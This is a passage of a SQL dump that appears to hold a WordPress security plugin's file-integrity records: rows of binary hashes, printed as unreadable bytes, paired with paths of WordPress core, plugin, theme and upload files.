��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q�?J����fQ</�','���]ȧK�a6 �����W}t��HlŲ�0T','',0,'?'),('� J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�\n��Cm�Q�Uܓq��','wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�L���R\'�9�xi','����`D\\^)�I(�H�;��1+.c��\0�7�','',0,'?'),('���@�3�rC\Z�_�','wp-content/uploads/2019/08/Green-Energy-150x150.jpg',0,'�UK=�8f1Ӂ\n6G��','�UK=�8f1Ӂ\n6G��','L�L���Lp�3����=����C�\rk�Ժ��^','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';:,)5�����`&\0�','UI��Li�p�p\\�ڐT�[o���/K#(����','',0,'?'),('�\'P��T]� �6�~�','wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^K��-^��>A�s{�','�%>��:1��W��R����ͩ��Q�i��~�^G','',0,'?'),('�?8Rm�ТE7h��<�','wp-includes/blocks/buttons/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�.�$B�\\&����','u���+Ek��~�n���xGz�y�f�gK','',0,'?'),('�G�E��cZ㊉1�','wp-content/uploads/2019/08/thai-property-updraft-pre-smush-original.jpg',0,'Rd�kL��o\\<','Rd�kL��o\\<','��j?�<�]�y_�j�VD�(�\n;�p�^p�^','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g4i�e��ڠ�Y,׃','u,�tsn��`�b�$�D�r�FRS��r�ґ�^\"','',0,'?'),('�H��ɪ\Z4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�O�(��R#Z\n�Pw','wp-content/uploads/2019/09/garden-1680802_960_720-150x150.jpg',0,'>��8�0\Z|�J��0','>��8�0\Z|�J��0','S�fIUOz�7;��J{�VK[ҝ�M�K,�c�c','',0,'?'),('�Q����ԁ�2�7u�L','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���3y����1��',' }��N� <�v���B�S%�s\\���S�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{q10vƳ��|2]s�Y','F^���S�,T&�>�������8���я�g','',0,'?'),('�UA�Q�,U���q���','wp-includes/blocks/pullquote/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0��%�\\���','Wӂ��,e�l�A��52.��,N��P��$Q','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9����V���>�1','����%���6�i���;K2P����>�}�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�?�M�u���N','�c-7E��)i+���$�=�c�E+Inݽ�-��e�','',0,'?'),('���o��W���� �e','wp-content/plugins/wordpress-seo/inc/health-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O��,f�g`��r','h�/��*-}f�<c��p0�6�K�=��H','',0,'?'),('��Z��,�� �fi\0��','wp-content/uploads/2019/08/Therapy-350x220.jpg',0,'%@�>7,�*$̠�u�','%@�>7,�*$̠�u�','� F��gmXz��ߎ4��RwQg(��8��E� ��','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J� Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��wF��ȶ���# �','wp-content/plugins/wordfence/modules/login-security/views/manage/grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��o�}�$\Z�X�','��EʕG��!�ܷ�[�~r��:��\'O�','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����8#i�j�g�m,�','wp-content/plugins/redirection/locale/redirection-en_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʒ�zs(�SL@2v�M','����8<����Z�˝������8����sox','',0,'?'),('���tb���`s]\'','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Provider/AbstractProvider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gǐC�h�2/�,�','�cV?��;�.��ü�Ժ��v�a�ۡ1�`Y*C','',0,'?'),('��hZ<�5�}K˲�','wp-content/plugins/wordpress-seo/js/dist/select2/select2.full.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"�Rn�2]��N9','C�u\"������P]UH%kw vO�,/ˋ\rg�','',0,'?'),('����R��BK��^��','wp-content/uploads/2019/09/gardening-768x535.jpg',0,'�m�d=J�Z��N��x','�m�d=J�Z��N��x','?�Q�q���-\r�:Z#l1�t}����(u�','',0,'?'),('��P%FI�-�dU��','wp-content/uploads/2019/06/fiber-optic-2749588_960_720-350x220.jpg',0,'�&��9(X�J9k��','�&��9(X�J9k��','������^J�.��&@0\rLT��<����R','',0,'?'),('�Ho��/z ���=F=','wp-content/uploads/2019/08/Therapy.jpg',0,'�Q<.ː?�:BG ��','�Q<.ː?�:BG ��','���O4�2��\'`�34���*ؘI<\Zg�\Z','',0,'?'),('�����հ ̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q*ZZ�sq���A}p�','?L\0e}���z4�t,�N)^�Q����À۲','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��$�Y�\Z8�','',0,'?'),('� ��\'��M��E�x��','wp-content/themes/vega/sample/images/featured-image-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=m�ʯ�(Dc/<Vk','��z�u�C���7(;��q���왚2l:�h','',0,'?'),('�$gJ����O��=�','wp-content/plugins/redirection/locale/redirection-lv.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`T<A*�z�!?��fS','ky\"ŇcƠ��/_�DV}\\�ے2�4_��l','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m@�)����','�Jl�גC���s�_DnƊ\\\Z.���Xz�','',0,'?'),('�(���Ϲ��ز���','wp-includes/blocks/video/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,V�%�ξ���]','S*���q$�2x��e�߹�<�e�{���=#�4�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��03���qgP\"J�#','t#�O|z��Ы�{o�@����YW�~��[[�c�','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�4\nR����c8_sVuA','wp-content/plugins/redirection/models/url/url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�\\\r�QD�*/��f1','���f���n��zG5Vf�� �O��v#�� _','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;� �0�~�rs1J�9��X���J���','',0,'?'),('�`�h�sY%3d��d','wp-content/plugins/redirection/matches/language.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�d�з��d$�','���m\n\"֩�]��&���A\"y��Ԓ��n2�\"}','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HLt&לk$*A�i�ŷ','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�he��M]�BӱS�˜�','wp-content/plugins/redirection/models/fixer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �~�2�9lm�A���',' W~k�S�����:7����),5�X�k(5c�','',0,'?'),('�ir�u�5������','wp-content/themes/twentytwenty/assets/js/index.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����χ��.7\\(,�A�','M���`�A�(q�ɻ\"�z�\Z0(yO�ͷ��','',0,'?'),('���Nl0<+�ox','wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K]|RxYY�\\���,2ϳ','b��X;�8�< �����@���bp��U)','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Em/��','�MT�g(���ھӈ:�r,E��0�$�9�XH�','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���8���ՠ�)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB-���L\'�g�Aq','vɘ(�f]A��?p�AR\Za��Ɓ& A9\r[��2','',0,'?'),('���M��=�FI\ZS�=','wp-content/uploads/2019/09/planning-permission-garden-300x250.jpg',0,'����c�O��ؾ���#','����c�O��ؾ���#','�[��I���d�Or+�A&�>F�-1�����','',0,'?'),('����##Ցn\ndA\\�e','wp-includes/blocks/latest-comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\'���q4�PS���','��@�iSt�\r�-���u�,w��*�n�3','',0,'?'),('����~�`�gtl�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-el.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʵ�~���&>\0�gbxE�','��0�����8 �^ij�����or�\n','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=[\'��N�Ԍ0{��\'�','�j�罚;���Ob�69�Y�5\rVj�|N3�','',0,'?'),('��#�<�8^;�6O;','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-title-intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1�V�p-���\r�','t�H��>��\"�\0h���8:�:^��w�x��J�','',0,'?'),('��>i�>C�.�|#�q','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3R�O̬p��/���','4���Gn<?�Zp���g�cr�*��M','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/�������_S��L��`ZI�I(1���','',0,'?'),('����_�KY���\'O','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_PE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XUo�\'���`D\'0f�N1','����ht]�d>��x=\n�`���5�];��','',0,'?'),('�!��Ϋ\'�ϥ�p','wp-content/plugins/wordpress-seo/js/dist/post-edit-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�\\G�%~ŭ$m��=','[[7�v�rw� �\07��� v����V�Z���)�','',0,'?'),('�*�Y��\rBj�y�\n','wp-content/uploads/2019/08/business-training-300x250.jpg',0,'_ǖW��&9+���%�','_ǖW��&9+���%�','( �6�ʑ�ʘ�~�o�H�p���','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR�v�J�%-�/\n�V���','',0,'?'),('�\'&o�Sw6�����(�','wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì� VP�[?��W��>','�����\" ���#cv8!��|��:��̳�','',0,'?'),('�)+���]gg�','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Bold.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fѭ�,Uz�1�h','���\Z��ûF�n\ZJ��Opm�O���nD�J+','',0,'?'),('�+�i�p�ZӶtB','wp-content/themes/twentytwentyone/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��rA�_�ù�_9','�ޔ�<N�6����o8���\r�����$i','',0,'?'),('�0�r��f�o���=\ZZ�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/breadcrumbs-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',': P�q�yX�\\J!��W_','�4\0CS�I氬)�\r�Wz��&B\n@]0_u��M��','',0,'?'),('�2��s|��w�z','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/AbstractGrant.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�?�����oK�l�','���Qܪ���@-a<��|ߛ���&','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʥ�Gz�1[��yԆ��','^hK�\'�[��?m�>V#�kD��\Z;�V��h�','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kR�f,�J���k�','��f�!��\rWe��=?��K���jP&�*y�|','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ;l�G9��','',0,'?'),('�N\"�,�_� 3���B�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�B���4�H','i�썚<X�\'hw�4E�u�*\\���xQ��7�','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('��i�G���j#��)�','wp-content/plugins/wordpress-seo/src/generated/container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�\0/\ZT��v�5U�','AD����ފ=��\\�Li��-��뱼�','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F� &Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��x���Iy��f�Gv�','wp-content/plugins/wordpress-seo/packages/js/images/Yoast_SEO_Icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�m���h��GGU�','}SF�����iQc�_F��\"�MD�K��\rɡa','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('���wa��ew��UB%D','wp-content/uploads/2019/08/homeimprovements-350x220.jpg',0,'�%�D�\n������>','�%�D�\n������>','�-\rF �2v�Jkəw�H�q�N�w�螗�@>','',0,'?'),('�������1�!��N','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�\Zb�ZF���l\r^�','wp-content/plugins/redirection/locale/redirection-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�1]�hu�7;�@�','0�D�+��5G�S���\n�@�G�XQ��\0°','',0,'?'),('�;o��O�uT}��@T','wp-content/plugins/wordpress-seo/src/integrations/alerts/abstract-dismissable-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-u���J�fO�h�','� A�$��y��[-�d����Bu\\� ^=7Z@J','',0,'?'),('�a�<��t!j�j��s��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����G�{��E���','�����k�נ��t>RA�\r����|3�','',0,'?'),('�j]�{�v�Q�@��','wp-content/uploads/2016/11/interior-design-2047075_960_720-768x576.jpg',0,'��\n��h�2.���X�','��\n��h�2.���X�','a��Z�W�f||�ՠ�nOE�x�\r�J|m�%�','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('�~r�q��7�7P[d','wp-content/plugins/wordpress-seo/css/dist/dashboard-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9\ZwIn/�D^\nYy','ҧ��IWT�L�=0����3�s:q�:��Ee��','',0,'?'),('���u�r*Y&ep���','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/abstract-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/m��g���INo&��<}','���C۸�yT�]��B 1N��Y%��A�rD','',0,'?'),('���\\F�Z�7i�','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�\0\0�P�qSqUь�','�n�BEqO�Ȉ����}]��� ��ULryi��','',0,'?'),('��7h5�\r�&�����','wp-content/plugins/wordpress-seo/languages/yoast-components-es_VE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q.�QFxR��3','߫�W7�Ce���Eȱ�i���e��o\r�\n���','',0,'?'),('���I:�.�X�<��!�','wp-content/themes/twentytwenty/assets/images/2020-square-2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H��4(��|���&�','�`�z�z�Y`]���3��)�]:a>�?oez��','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~i�����+We7�WQ�','!��L��?����O#�W�BpdA��NmpcW>','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' %>�)���;��','F��S�[k���&�f� 6+�b�>��','',0,'?'),('�ä2��8�����j','wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~��&WD����_','..�#*�CH�����V��������oi&Y:b�','',0,'?'),('��t��h� ,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('��Ū����֍����E','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nǠ�K��)����S','Ɂ7�U�<F9d�+�p��$��ʴ�y\\�','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�&�����ھ�\Z','v��<��� �0��t�\r��u�����^L�','',0,'?'),('��}B�[�^�cQ�\n;w','wp-content/plugins/wordpress-seo/inc/wpseo-functions-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7)�bw+���','��#nRz���n�Z\\�q�@�B���טrOܮ','',0,'?'),('��~n�K$^�R���','wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-login-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�&&bÔl��T�Hְ','fNb�#�a#����㣾$��ò�}��s�e&','',0,'?'),('��:魩�*�/��m¸','wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-type-archive-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��Jҭ��&�^č�','�G�\"���.`-W=D��鼎�e���?[��L','',0,'?'),('��c�cXRd���','wp-content/themes/twentytwentyone/.stylelintrc-css.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VH�G�쬠�B�U��Q','�tc�u�w���xă��;0���1�-','',0,'?'),('�+S����X�j.?n','wp-content/plugins/wordpress-seo/src/schema-templates/recipe.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�]ެ*����V�4\n�8','͈��{_ �x�(�徶f�3v ��u���$�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�\"�W\"��Y �υ0�','wp-content/uploads/2016/11/kitchen-2165756_960_720-768x508.jpg',0,'�yuH�H���!#�0�','�yuH�H���!#�0�','�0S���?��\r.3��{����Wu���\0���','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!z������̥','+���A�S��џbH��濳�$�V�+��N�','',0,'?'),('�2K+LzY��s7�Zv','wp-content/themes/vega/sample/images/featured-image-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ch\nu.2��M�h^��','��ȵ�-^�s��s=%�|䧤D��_v�n�U[�','',0,'?'),('�A�#! �-FfN��','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_CR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�\Z+��r$=I+zq^','4��@�{�I�;�nR��I|tdL��\"wyX��','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�UU4�@7�j���CP','wp-content/uploads/2018/05/builder-300x200.jpg',0,'�� [N;��:�H?�Tk�','�� [N;��:�H?�Tk�','�� � �u2J.k>ڥ�lF�W �D=�0�,','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��~H���;���',':X��ץ�D�W�G��IV�x(��Yƣ��','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۼ���P�L20��&�','l)�V�\'B\0�:�����hֵf�;\0<Ń��½','',0,'?'),('�t��.!h�t�%h��','wp-includes/blocks/video/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','人�ejqpu�Kq','�3��6�=����[��E3�����M��,�-','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('��PF�f\'��\\9�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-de_DE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����^\"�z���hj�8','�f2+�ĉ�|I���@���7s�2��Hf�G�h','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('��[�s::��q��+�','wp-content/themes/twentytwentyone/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q���M\"�BC� �','���~Բ��+@�w�GՑ.4C�O��iC���','',0,'?'),('���4]3�mW\0�/A�T','wp-content/plugins/wordpress-seo/js/dist/schema-blocks-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R$]�D6�J(8?\r 